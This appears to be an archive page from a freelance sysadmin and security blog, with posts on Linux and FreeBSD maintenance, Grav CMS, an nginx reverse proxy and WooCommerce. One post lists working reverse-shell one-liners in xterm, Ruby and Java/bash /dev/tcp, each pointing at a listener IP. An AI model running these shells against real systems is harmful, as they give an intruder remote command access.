Gray Hat Freelancing

He who would fight monsters should see to it that he does not become one.

Gray Hat Freelancing/
27 05, 2020

WooCommerce Makes a Mess

By |2020-05-27T17:06:37-04:00May 27th, 2020|Errata|0 Comments

Saying Goodbye to WooCommerce

Regretfully, I have to admit that WooCommerce makes a mess of the WordPress database. And, since promoting partner products is not the goal of this website. I am separating it from this installation of WordPress.

Do not misunderstand me. WooCommerce is a great and solid product. I enjoy working with it, as much as anything. But, since I need this website to drive leads more than partner sales. I’m giving my partners their own store, off-site.

Sorry for the mess, recently. This will make things much more manageable for me and hopefully easier for you. Now, I only hope Google doesn’t ding me too hard for temporarily 301 redirecting all 404s to my front page (where this is sticky). It’s a price I will just have to pay for a month.

woocommerce is back already
WooCommerce is back already?!

Saying Hello Again to WooCommerce

You can find all of your Acer, TigerDirect and Tech4Less discounts at https://shop.grayhatfreelancing.com.

That being said, let me make a few things clear about the store. The store is just promotional links to my partner’s products. I do not have access to your orders or payment information. The purpose is to allow my clients, potential clients and readers a chance to browse the offers my partners are wanting me to promote. A lot of them are very good deals for very solid products.

Let me be very clear. The shop is NOT a drop ship. Clicking on the product will take you to a product page with a brief description and provide other useful information like prices. Clicking on any of the buy buttons will take you directly to their official store and automatically apply my partner code for you.

I do benefit from the transaction. But, this is one of the few cases where it comes out of their end, not yours.

Enjoy!

28 05, 2020

locale: Cannot set LC_ALL to default locale: No such file or directory

By |2020-05-28T00:13:15-04:00May 28th, 2020|Engineering, Random Fixes|0 Comments

Cannot Set Default Locale

This time, as almost every time before it, it is all my fault. I decided to use an untested tool, to help with my clean up tasks, during some maintenance and I am paying the price. I just reconfigured the default locale, one of the first things you configure when you’re installing linux.

This is the second problem I’ve bumped into and I realize now that I’ve bungled my /etc/. Being an engineer, this is okay. But, for some of you, this would be reinstall time. Allow me to rewind.

cannot set default locale
cannot set default locale

Suddenly, I can’t use ‘sudo’. Have I been hacked?

I was alarmed during the maintenance, because suddenly it seemed as if my password had changed or I otherwise could no longer use ‘sudo’. I also tried to switch users with ‘su’, into root, and that wasn’t possible for me either. You may find this odd, but that was actually a relief.

Obviously, I was aware that I was doing maintenance and cleaning up file lint (in this case, a lot of “.pacnew” files in etc, as well as “.old” had begun to pile up). In my haste to make good time and get back to work, I went ahead and told a particular tool to go ahead and replace the files with the “.pacnew”. I should’ve made sure to check that it was going to replace /etc/shadow. But, I didn’t.

Restoring /etc/shadow on Manjaro

Realizing the problem, I powered down and grabbed my bootable USB stick, loaded with a Manjaro installation image. For this trick, you can likely use any bootable linux distribution. I’d even recommend a distribution that is intended to be run from removable media. Because, that way, if you find your situation to be much worse, you have more tools are your disposal.

It booted into the live linux just fine. I unlocked my encrypted drive and mounted it. Browsing to the ‘etc’ folder, I was fortunate enough to find my shadow.old file sitting there. As well, I can proudly say that it did have the correct permissions set as well. So, my backup shadow file was not exposing sensitive secrets. An easy fix for me, but what if you don’t have your old shadow file?

In that case, the go-to fix is to set the password to a known value, so you can copy and paste it into other accounts, to restore normality. Once you’ve achieved that, you can reset those other accounts to stronger passwords once more. Let’s get back to the default locale issue.

cannot set default locale
cannot set default locale

locale: Cannot set LC_ALL to default locale: No such file or directory

Now, I’m familiar with why this happens. But, I was a little annoyed this time. Normally, a quick export LC_ALL=en_US.UTF-8 solves all problems (for Americans speaking English, anyway.. your default locale may be different). Well, that’s only because you’re used to SSHing into your linux machines. I realized, the second time I launched a terminal and the problem had returned, that I had done more damage before than I originally thought.

But, the optimist in me wanted to think that maybe wasn’t the case. So, I waded through all of the other possible default locale issues and the people responding, and upvoting, the above export LC_ALL fix. Turns out, often, someone has changed a profile setting, or other preference, in their terminal emulator (this is possible, it just wasn’t my problem). So, I check those and still nothing.

Finally, I bother to check /etc/locale.gen. Sure enough, it is default, everything is commented out. So, for me the fix was to purge my locale, uncomment my preferred locale in /etc/locale.gen and run locale-gen with sudo or otherwise as root.

All in all, I’m just taking this opportunity to allow errors to crop up, so that I can blog about fixing them.

Work your way back from system wise to local user applications.

If your locale issues keep coming back, exporting the appropriate default locale is only a temporary fix for that session, you’ll be wanting to check your terminal emulator (if applicable), local “dot files” that manage those settings and above all your system wide configuration. To save time, it’s best to actually do that in the other order. Start with the system wide configuration and work your way back into user configurations and finally down to specific applications.

Don’t let little problems ruin your day. Hire Gray Hat Freelancing to troubleshoot your next issue, fill out our form and we will give you a free consultation! We are “DevSecOps”, we do everything.. or, at least, it’s easier to list the things we can’t do. So, check us out!

27 05, 2020

Installing Grav CMS from the Terminal

By |2020-05-28T00:16:48-04:00May 27th, 2020|Engineering|0 Comments

installing grav cms from the console
Installing Grav CMS from the Terminal

Installing Grav CMS using the Command Line

Grav CMS is a great flat-file CMS written in PHP. It’s been around for a while and features plenty of themes and plugins. Though, the community around it tends to roll their own.

Written in twig, php, css, html and markdown. Grav finds itself one of the fastest CMS out there. It’s a real competitor to WordPress and Drupal, especially if you have a good web developer. Lets deploy one, so we can play with it.

How to get Grav and where to extract it.

Grab the latest zip from https://www.getgrav.org or https://github.com/getgrav/grav . Note: If you choose to use github and do not plan on doing and core development on the CMS, it’s a better idea to get a zip from the website or the Releases tab on GitHub.

Once you have the latest release, go ahead and sftp it up to your webserver and follow right behind by SSHing in. Extract the compressed release archive and move all of the files into webroot. Be careful not to forget hidden files, often “dot files”, like ‘.htaccess’.

installing grav from terminal
installing grav from command line

500 – Internal Server Error – How to fix Grav’s file permissions.

Now that that’s out of the way, all we need to do is fix the file permissions and we’re up and running. Once we check that, we should go ahead and install some useful bits.

find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;
setup grav proper file permissions
fixing file permissions during a grav cms install

I’m going to grab the admin plugin, so I can manage Grav’s flat file CMS from the comfort of a web GUI. Please note, that if you decide to do the same, you’ll want to break out your web browser again. So you can register an admin on the world’s fastest flat file CMS before some random miscreant comes by and does it him or herself.

installing grav's admin panel
installing grav’s admin panel

Now you can pick a theme and start blogging with Grav!

successfully setup grav cms
Grav CMS’ administration panel

If you need any kind of back end server work, Gray Hat Freelancing is eager to help. Fill out this form for a free consultation!

22 05, 2020

ERROR: Failure while downloading nitrux-icon-theme_3.5.3.tar.gz

By |2020-05-22T06:27:35-04:00May 22nd, 2020|Engineering, Random Fixes|0 Comments

error-failure-while-downloading-nitrux-icon-theme
ERROR: Failure while downloading nitrux-icon-theme

Arch/Manjaro Update Fails Downloading nitrux-icon-theme_3.5.3.tar.gz

I really hope this didn’t stump any of you. It’s okay, if it did, you probably didn’t use the console and therefor probably didn’t see what actually failed. So, the link to the package, nitrux-icon-theme_3.5.3.tar.gz, is dead. Which makes it kind of hard for the PKGBUILD script to download it, build it and install it.

Locating the missing source for nitrux-icon-theme on the AUR

And, if you run a quick pacman -Qi nitrux-icon-theme you quickly see there’s supposed to be a nitrux website at https://nitrux.in/. But, trying to go there, you can see they closed their doors. The project forked into two projects now known as NX Desktop and Nitrux OS.

I’m probably wrong (according to my girlfriend, I am always wrong), but since the launchpad.net team references the Nitrux OS domain, and it was the last source in the PKGBUILD in the AUR, I kind of assume it was the more “official” source (at least as far as following the package maintainer’s intent). Looking quickly at their website, we get sent off to trusty old GitHub where the repository is now Archived (this means, no longer supported).

Quick patching the PKGBUILD file for missing source nitrux-icon-theme

There’s a chance here the AUR package maintainer has noticed this and simply wants the package to die. He’s not responded to quite a few comments on the AUR as well. Anywho, here’s the fix:

error downloading sources nitrux-icon-theme
Edit the PKGBUILD for nitrux-icon-theme
  • Grab the latest release from GitHub: https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
  • run md5sum on the gunzipped tarball
  • rerun pacman with –editmenu so it asks if you want to edit the PKGBUILD file
  • Select any option that allows you to edit the PKGBUILD file (for me, using yay this was [A]
  • Update the source field with the latest available release
  • Update the md5sum field with the m5sum command’s output
  • Write and exit the PKGBUILD file
  • Continue the installation

ERROR: Failure while downloading nitrux-icon-theme – Fixed! Quickly!

wget https://github.com/Nitrux/nitrux-icon-theme/archive/3.5.4.tar.gz
md5sum 3.5.4.tar.gz
yay --editmenu -Syyu nitrux-icon-theme

Check out other random fixes on Gray Hat Freelancing.

20 05, 2020

One Liner Reverse Shells, Remote Desktop Edition

By |2020-05-23T15:27:29-04:00May 20th, 2020|Jeet Kune Crypto, One Liners|0 Comments

one line reverse shell xterm
one line reverse shell using xterm

So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.

Xterm One Line Reverse Shell

You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:

xterm -display 10.0.0.1:1

Boom! Remote desktop.

Ruby Reverse Shell in One Line

Listen on port 1234, obviously.

ruby -rsocket -e'f=TCPSocket.open("172.16.16.169",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java One Line Reverse Shell

This one is cross-platform, as Java always tries to be. Listen on port 2002

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.169/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

20 05, 2020

Building a FreeBSD Desktop Quickly and Easily

By |2020-05-20T06:57:13-04:00May 20th, 2020|Engineering|0 Comments

freebsd desktop installer (starting with a vagrant)

Deploying a desktop on FreeBSD is not as hard as many people claim. In fact, if you “just want to be up and running” quickly, it’s entirely possible to do so. I often take this approach, before I start compiling things for my particular setup.

I’m going to show you how to do this properly, using VirtualBox and vagrant, just for the sake of this post.

How to Quickly Build a FreeBSD Desktop

As usual, once we boot into FreeBSD, we’ll want to check for any updates. It’s best to make sure we have the latest and greatest version of our release. As well as the most up-to-date version of any and all packages, as possible. Then go ahead and reboot, if necessary

Update FreeBSD and Your Package Repository

freebsd-update fetch
freebsd-update install
reboot
pkg update
pkg upgrade

Great, now we can get to building our FreeBSD desktop, for the sake of productivity we’ll start with the binary pkg version. You’re going to slap me, if you spend more than 20 minutes building your first FreeBSD desktop from scratch. But, this is all you had to do.

freebsd desktop installer pkg install desktop-installer
install the freebsd desktop-installer using pkg binaries
pkg install desktop-installer
desktop-installer
install desktop for freebsd lxqt
freebsd desktop lxqt setup

Select Your Favorite Window Manager

No joke. That’s all there is too it. I selected (8) for LXQT. But, you may select which ever you like. In general, Gnome or KDE tend to be larger, clunkier desktops full of bells and whistles, full featured, etc.. while the other’s tend to be more of a hodge podge.

But, you’ll probably find, as I have, that the flexibility offered by XFCE, Openbox, MATE, LXQT, etc.. is worth the hassle of rolling your own desktop. Of course, for the keyboard-only crowd, there’s i3/i3-gaps, bspwm, awesome and many more to choose from.

Happy hacking!

lxqt installed on freebsd as a desktop
LXQT FreeBSD Desktop
11 05, 2020

Post Thousands of Products on WooCommerce Instantly

By |2020-05-12T05:16:50-04:00May 11th, 2020|Engineering, One Liners|1 Comment

How to Post Thousands of Products on WordPress Instantly

Importing large amounts of product data into WordPress / WooCommerce can be a daunting task. Here’s how you can instantly publish thousands products on WooCommerce using the terminal.

mysql -u dbuser -p dbname
update wp_posts set `post_status` = 'publish' where `post_type` = 'product';
publish thousands of products instantly
If you guessed that we’d use the command line. to publish thousands of products, good for you. :)

SQL databases are awesome! That’s right, and you can simply change ‘publish’ to ‘draft’ to delist thousands of products as well. You should take a look through wp_postmeta and see all the various meta keys you can use to filter products and work with your catalog through the command line. It’ll save you time and money.

7 05, 2020

Building an Awesome NGINX Reverse Proxy for WordPress and Apache

By |2020-05-11T04:13:44-04:00May 7th, 2020|Engineering|0 Comments

building a bad ass nginx reverse proxy for wordpress
nginx makes a bad ass reverse proxy for wordpress

How to Setup NGINX as a Reverse Proxy for WordPress and Apache

I don’t know why I keep torturing myself, but I do. And you get to enjoy the fruits of my labor. Today, we’re going to setup an Nginx reverse proxy for WordPress, running on Apache. Hopefully, you’re already familiar with configuring Apache for WordPress. It’s pretty straight forward. And, once you get used to the syntax, configuring Nginx is pretty straight forward too.

Apache can be tweaked to be pretty damn fast. Nginx is just plain fast. But, Apache is extremely featureful. So, that’s why I’ve decided to set this up this way. Apache will still have access to it’s robust catalog of modules, but Nginx will handle mosts of the requests coming to the web server.

In case you didn’t catch on, I am going to run these services on the same machine. But, yes, you can host them on different machines.

install nginx reverse proxy for wordpress on apache web server

Installing NGINX Reverse Proxy

I really wish I was able to skip this step, but I can’t. Because, if you already have Apache installed and configured (at least, on Debian, my distribution of choice for this project – fuck systemd), you’ll need to stop apache to install nginx using the apt toolchain*.

You could do several other things, like ensure Apache is not listening on port 80, yadda yadda yadda. This one belongs to the package maintainers for Nginx, if you’re wondering (which, since they maintain their own repo, is likely some systemd loving folks.. I’m sure they’re good people either way, much love for everything Open Source).

systemctl stop apache2
apt install nginx-extras
systemctl stop nginx && systemctl start apache2

Configure NGINX Reverse Proxy for WordPress on Apache Web Server

Now we can get into the meat. First we need to tell the Apache web server to listen on a different port and local only. Port 8080 is popular for standard HTTP, which we’ll use. But, I urge you, especially if your Apache web server is on a different host, to use HTTPS and 8443 (or any non-standard port). You can lock it down, so it only allows the proxy to connect directly, if you like. I won’t cover that here.

Let’s edit /etc/apache2/ports.conf as well as the vhost config for our target domain to be proxied. The vhost config is typically located in /etc/apache2/sites-enabled/vhost.conf
Also ports.conf may simply have that some configuration information in /etc/apache2/apache2.conf (or httpd.conf, the folder can be different, the list goes on).

Change the ports to 8080 and 8443 (or your desired non-standard ports). It’s also safe to turn off HTTP, at this point, if you’re using SSL. This webserver isn’t outward facing, ideally. So, you no longer need the redirect (your plugins may complain).

nginx reverse proxy for wordpress /etc/apache2/ports.conf
nginx reverse proxy for wordpress - netstat antlp

netstat new ports reverse proxy wordpress
desired results at this point

Finalizing NGINX configuration for role as a reverse proxy for WordPress on Apache

From here, you can edit /etc/nginx/sites-available/default if you want. Or you can unlink it from /etc/nginx/sites-enabled/default and start your own new configuration file. I chose the latter option. My Nginx reverse proxy for wordpress isn’t going to use much of the default configuration. So, I just preserved it for later. Lets get some proxy basics set up, outside of the server block and a quick redirect. Open a file in /etc/nginx/sites-available/ (can be editing default or a new file) and add the follow before the server block.

proxy_connect_timeout 600;
proxy_send_timeout 600;
proxy_read_timeout 600;
send_timeout 600;
proxy_cache_path /var/run/proxy_cache levels=1:2 keys_zone=REVERSE-PROXY:30m max_size=1000m inactive=60m use_temp_path=off;
proxy_cache_key $scheme$host$request_uri;
proxy_buffers 1024 64k;
proxy_buffer_size 128k;
proxy_set_header Proxy "";
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

Now we’ll turn port 80 into a 301 redirect to port 443 for SSL. This is the appropriate method for forcing SSL on Nginx by the way, you should not have a server block with both 80 and 443 open.

server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _;
return 301 https://$host$request_uri;
}
nginx cache proxy server block serving apache




New we get to set some rules specifically for WordPress to work:

# wordpress cookies no-cache
if ($http_cookie ~* "comment_author_|wordpress_(?!test_cookie)|wp-postpass_" ) {
set $skip_cache 1;
set $skip_reason Cookie;
}
# more wordpress love
if ($request_uri ~* "/wp-admin/|/xmlrpc.php|wp-.*.php|/feed/|sitemap(_index)?.xml") {
set $skip_cache 1;
set $skip_reason URI;
}

Finally, the section where we pipe things over to Apache. This should let you know, we’re almost finsihed.

The Actual NGINX Reverse Proxy for WordPress Configuration

the actual proxy - NOTE: you may need to toggle proxy_redirect on or off if you get a redirect loop when logging into admin
location / {
proxy_set_header Host $host;
proxy_redirect off;
proxy_cache REVERSE-PROXY;
proxy_cache_revalidate on;
proxy_ignore_headers Expires Cache-Control;
proxy_cache_use_stale error timeout invalid_header updating http_500 http_502 http_503 http_404;
proxy_cache_bypass $skip_cache;
proxy_no_cache $skip_cache;
proxy_cache_valid 200 301 302 360m;
proxy_cache_valid 404 5m;
# feel free to rename PURGE, if you want (here and elsewhere)
proxy_cache_purge PURGE from 127.0.0.1 192.168.1.166;
proxy_ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
proxy_ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
proxy_pass https://127.0.0.1:8443;
nginx reverse proxy location block for proxy config and tls certificate

Now start up nginx with service nginx restart and you’re off to the caches, I mean races. Congratulations!

nginx reverse proxy for wordpress
28 04, 2020

The Fastest Way to Upgrade FreeBSD 11 to FreeBSD 12

By |2020-05-06T17:02:59-04:00April 28th, 2020|Engineering|1 Comment

How to Quickly Upgrade FreeBSD 11 to FreeBSD 12

Ever need to upgrade FreeBSD to the next release? It’s not hard! We can compile kernels some other day. Today, we’re just going to do binaries. Quick and easy, FreeBSD is the best.

Go ahead and log in to your machine, elevate yourself up to root (or use sudo). Lets get this show on the road: freebsd-update fetch

freebsd-update fetch & freebsd-update install

freebsd-update fetch && freebsd-update install
upgrade freebsd 11 to freebsd 12
upgrade freebsd

This process is not hands off. So, you’ll need to accept a few prompts. Generally, this is the only time you’ll really have to reboot FreeBSD, if you’ve been treating it well. But, in this case, I don’t run into the need for that (heh).

Once the update tool finishes grabbing all of the patches and applying them. We’ll need to update the pkg tool. The pkg tools is used to maintain binary packages on the system. If you’re a sane person, you either use pkg or the ports tree. The sanest people build binary packages from ports and keep a local repository, but that’s for another article.

upgrading freebsd 11 to 12 from the terminal
upgrade FreeBSD 11 to 12

Upgrading Binary Packages on FreeBSD

This tool keeps things as simple as they can be. So, if you’re familiar with POSIX compliant systems, you’ll recognize this process. Let’s continue to upgrade FreeBSD 11 to FreeBSD 12.

Use the static pkg binary to update the tool and then all of the installed packages. Again, I’m just going to go ahead and bang it one in one line. Any time you see me use &&, you can safely break the command into two commands, if you want. It is two commands anyway, just on one line.

pkg-static upgrade pkg && pkg upgrade
upgrading freebsd packages with pkg-static
using pkg-static to upgrade pkg tool
freebsd's pkg-static has upgraded the pkg tool
pkg-static upgrade pkg success
using pkg upgrade to upgrade freebsd 11's binary packages
use pkg upgrade to upgrade freebsd’s binary packages

Yeah, that’s a lot of packages. Let’s make sure we’re on the latest FreeBSD 11 release, which should be FreeBSD 11.3

uname -a
checking freebsd 11's minor version with uname -a
uname -a freebsd 11.3

Completing the Upgrade FreeBSD Process

Good. Now we can get back to upgrading the kernel to the next major release. Time’s running out for security updates for 11.3 and we don’t want to still be around, once it does. Back to the freebsd-update tool

freebsd-update upgrade -r 12.0-RELEASE
upgrading freebsd 11 to 12 - almost there
freebsd-update upgrade -r 12.0-RELEASE
ugprading freebsd 11 to freebsd 12 requires A LOT of patches
freebsd-upgrade -r 12.0-RELEASE

This one will take a while. It should inspect your system and ask you if you agree with what it has found, then it should go grab a matching FreeBSD 12 image to apply on top. Now we will need to reboot. But, take a walk, if you want, make a sandwich or whatever.

We’re almost done. We need to check some things and that’s about it after this. You can e-mail me if you want me to do any of these things for you. Please do not forget that. It’s how I put food on the table.

Next Time Don’t Wait So Long to Upgrade FreeBSD!

freebsd-update finally breaks free
freebsd-update install (going to freebsd 12)

You guessed it! We’re going to go ahead and apply all of those, oh so many, packages. Run freebsd-update install

freebsd-update install

It goes fast than you’d think. And, since we’ve finished patching away from FreeBSD 12. We now need to reboot and finish the final details of this FreeBSD version upgrade.

reboot
freebsd-update install

Congratulations! See how easy that was? I really love FreeBSD!

Apparently it wants us to run freebsd-update install three times, this time. If you compiled packages from ports. You’ll absolutely need to do this. And, if you didn’t, you’ll want to do this anyway because it removes a bunch of file lint that you’d otherwise have to do yourself.

Either way, welcome to FreeBSD 12.0-RELEASE!

freebsd-update install
uname -a
upgraded to freebsd 12.0-RELEASE
FreeBSD 12.0-RELEASE

The hackers at Gray Hat Freelancing are here to help you with any project you have that’s IT related. Tell me what you want to do and I’ll tell you how I can help you achieve that end. Have a good one!

20 04, 2020

p11-kit-trust.so exists in filesystem – Quickly Fixed!

By |2020-05-28T01:21:30-04:00April 20th, 2020|Engineering, Random Fixes|0 Comments

Solving nss: /usr/lib/p11-kit-trust.so exists in filesystem

Error: Failed to commit transaction (conflicting files)

I crossed this one today, nss: /usr/lib/p11-kit-trust.so exists in filesystem, doing a full system upgrade on my daily driver. I use Linux Manjaro for all purposes. As I was installing an English thesaurus, I decided to go around and sync with the upstream repository and do a full update.

yay -Syyu mythesia

This hardly happens, but sure enough, I got this error:

error: failed to commit transaction (conflicting files)
nss: /usr/lib/p11-kit-trust.so
libs32-nss: /usr/lib32/p11-kit-trust.so

For the record, yay is just a wrapper around pacman for updating Arch and Manjaro. It also utilizes the AUR, if you want it to. If you haven’t used it, it’s worth checking out. Just know that it could be part of how I ended up in this situation.

p11-kit-trust.so file exists in file system
fike exists in filesystem

At first glace, that’s alarming. Those packages, nss and lib32-nss, are required by tons of packages. Meaning all of those packages depend on them. But, don’t panic. I was ballsy enough to try and just overwrite them and it didn’t brick my system. So, it’s fine.

p11-kit-trust.so file exists in filesystem
sudo Don’t argue with me

The Fix for ‘nss: /usr/lib/p11-kit-trust.so exists in filesystem’:

yay -Syyu --overwrite /usr/lib/p11-kit-trust.so --overwrite /usr/lib32/p11-kit-trust.so
p11-kit-trust.so file exists in filesystem

Contact me, any time, for a free consultation.